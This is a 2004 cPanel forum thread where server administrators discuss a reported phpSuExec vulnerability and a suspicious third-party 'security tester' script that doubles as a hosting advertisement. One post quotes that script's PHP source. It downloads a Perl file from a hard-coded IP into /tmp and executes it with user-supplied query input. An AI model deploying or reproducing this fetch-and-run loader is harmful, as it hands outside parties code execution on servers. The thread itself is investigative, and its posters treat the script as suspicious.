The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

phpsuexec vulnerability?

Discussion in 'General Discussion' started by LBJ, May 24, 2004.

  1. LBJ

    LBJ Well-Known Member

    Joined:
    Nov 1, 2003
    Messages:
    56
    Likes Received:
    0
    Trophy Points:
    6
    Has anyone seen any details regarding a vulnerability in phpSuExec on cpanel servers where Apache was compiled with PHPSuExec before April 15th, 2004?

    We received a brief email notification from a subscribed list about it but have been unable to dig up any corroboration.

    I ran a search on the forum but was unable to find any related info.

    Any pointers to some documentation would be most gratefully received.

    LBJ
     
  2. sparek-3

    sparek-3 Well-Known Member

    Joined:
    Aug 10, 2002
    Messages:
    1,384
    Likes Received:
    23
    Trophy Points:
    38
    cPanel Access Level:
    Root Administrator
  3. LBJ

    LBJ Well-Known Member

    Joined:
    Nov 1, 2003
    Messages:
    56
    Likes Received:
    0
    Trophy Points:
    6
    Thanks heaps for that.

    LBJ
     
  4. HD-Sam

    HD-Sam Active Member
    PartnerNOC

    Joined:
    Sep 23, 2003
    Messages:
    40
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Iowa City, Iowa
    I compiled apache today, with /scripts/easyapache and choosing option 5 on 9.20-s25

    Vuln still exists.
     
  5. EDevil

    EDevil Member

    Joined:
    Feb 17, 2004
    Messages:
    21
    Likes Received:
    0
    Trophy Points:
    1
    Can anyone confirm that recompiling apache using easyapache still leaves us with a vulnerable system?
     
  6. Celta

    Celta Member

    Joined:
    Aug 30, 2003
    Messages:
    19
    Likes Received:
    0
    Trophy Points:
    1
    Anyone has successfully fixed this vulnerability ? I have recompiled too but result is the same. I'm using Apache 1.3.31 - PHP 4.3.6 right now, but tester php script shows I am still vulnerable :/

    I'd like to know what options you check on WHM when building apache.

    Thanks in advance.
     
  7. SarcNBit

    SarcNBit Well-Known Member

    Joined:
    Oct 14, 2003
    Messages:
    1,010
    Likes Received:
    3
    Trophy Points:
    38
    From the linked article:
    Does anyone now the changelog entry or bugtrak ID for this?

    I see that they are now saying that the security audit is 70% complete.
     
  8. GuiPos

    GuiPos Well-Known Member

    Joined:
    Jul 9, 2003
    Messages:
    59
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Indonesia / Germany
    from the whm panel

    i rebuild apache to version: apache (1.3.31 (Unix))
    and update also php 4.3.6. [suexec and phpSUexec ]

    make the test again and it seems to work fine.

    celta

    by rebuilding apache i enable suexec and phpSUexec i think this fix the vulnerability.
     
  9. Celta

    Celta Member

    Joined:
    Aug 30, 2003
    Messages:
    19
    Likes Received:
    0
    Trophy Points:
    1
    Thank you very much... I'll give a try and let you know :)
     
  10. Celta

    Celta Member

    Joined:
    Aug 30, 2003
    Messages:
    19
    Likes Received:
    0
    Trophy Points:
    1
    It worked ! :)

    Note that switching to phpsuexec, all customers must remove php_flags lines from .htaccess and that all .php files must have ownership of their respective users.
    Changing that, I've corrected 99% of faillures.

    Still to figure why some scripts (i.e. Typo3) doesn't work :/ ( maybe symlink issues in php files ?)
     
  11. eazistore

    eazistore Well-Known Member

    Joined:
    Nov 7, 2003
    Messages:
    70
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Singapore
    vulnerability fix?

    We are running WHM 9.3.0 cPanel 9.3.0-C55
    Fedora - WHM X v3.1.0

    Apache Core :1.3.31
    PHP Suexec: 0.1b

    After doing the cpanel.php test, we get this result:
    http://www.eazistore.com/cpanel.php

    Performing white box security audit...
    PASSED: cPanel INSTALLED (9.3.0-CURRENT_55)
    PASSED: Privileged UID Vulnerability Check (32022)
    FAILED: Stealth Snoop Vulnerability [/home/eazistor] Explain
    PASSED: Simple $HOME Scanning [/home/eazistor]
    PASSED: Group $HOME Scanning [/home/eazistor]
    PASSED: Root /home scanning
    PASSED: Simple WEBROOT Protection
    PASSED: Real WEBROOT Protection
    PASSED: SUEXEC mod_phpsuexec Exploit Test
    FAILED: One or more insecure cPanel configurations were detected. Visit A-Squad.Com for details on where to find more secure cPanel hosting.


    Any suggestion how to fix the FAILED status?

    Sincerely,
    Vincent
    http://www.eazistore.com/
     
  12. goodmove

    goodmove Well-Known Member

    Joined:
    May 12, 2003
    Messages:
    624
    Likes Received:
    0
    Trophy Points:
    16
    If you can execute the cpanel.php script, that means you are also vulnerable for allowing scripts to run from your /tmp directory.

    Cpanel.php fetches a .pl file from an obscure IP address and runs it from /tmp directory.
     
  13. tAzMaNiAc

    tAzMaNiAc Well-Known Member

    Joined:
    Feb 16, 2003
    Messages:
    559
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Sachse, TX
    A-Squad is using this as an advertisement for themselves as an hoster. :)

    That's a no-no.

    "If you host with A-Squad, you'll be safe."

    That already turned me off.
     
  14. rs-freddo

    rs-freddo Well-Known Member

    Joined:
    May 13, 2003
    Messages:
    832
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Australia
    cPanel Access Level:
    Root Administrator
    Looks like a scam to me.
     
  15. shann

    shann Well-Known Member

    Joined:
    Jul 5, 2002
    Messages:
    366
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Website Owner
    hi

    hi eazistore,

    I have same stauts coming. Did you get any fixed?. Please update it.

    Thank You
    Shann
     
  16. eazistore

    eazistore Well-Known Member

    Joined:
    Nov 7, 2003
    Messages:
    70
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Singapore
    Re: hi

    Hello Shann,

    After reading a few post above us here, I am starting to smell a fist too. It looks like it's an advertisement to use their services. Visit ??????.Com for details on where to find more secure cPanel hosting.

    I am not too sure if it's really an advertisement or just a scam to bring sales.

    What's your comment Shann?

    Rgds,
    Vincent
    http://www.eazistore.com
     
  17. shann

    shann Well-Known Member

    Joined:
    Jul 5, 2002
    Messages:
    366
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Website Owner
    hi

    Hi,

    I haven't deeply look at the script. We should consult with others on this forum as well.

    I am not sure about this .pl script run from /tmp, if it runs from there then we are in trouble.

    Let me do more investigation and post it here.

    shann
     
  18. eazistore

    eazistore Well-Known Member

    Joined:
    Nov 7, 2003
    Messages:
    70
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Singapore
    /tmp

    Hi Shann,

    From what I see inside the code:
    <?php
    $tester = "/tmp/tests.pl";
    if (!file_exists($tester)) {
    $testw = fopen($tester, "w");
    ini_set('user_agent',__FILE__);
    $testr = fopen("http://64.240.171.106/tests.pl","r");
    while ($s=fread($testr, 1024)) { fwrite($testw,$s); };
    fclose($testw);
    fclose($testr);
    }
    echo `perl $tester '$QUERY_STRING' 2>&1`;
    ?>


    I might not know much about php scripts but this line look suspicious $tester = "/tmp/tests.pl";

    I have remove that cpanel.php file from my server to cause any hard to it.

    I hopw some coder can explain if that script could cause any harm.

    Rgds,
    Vincent Kam
     
  19. eazistore

    eazistore Well-Known Member

    Joined:
    Nov 7, 2003
    Messages:
    70
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Singapore
    tests.pl code

    Hi,

    I have look into my /tmp and indeed there is a tests.pl in it!
    I delete it immediately to avoid trouble of coz.

    Here's the tests.pl contents if anybody would like to inspect it.
     
  20. goodmove

    goodmove Well-Known Member

    Joined:
    May 12, 2003
    Messages:
    624
    Likes Received:
    0
    Trophy Points:
    16
    It's allowing scripts to run from /tmp under a username that is the main issue.
     

Share This Page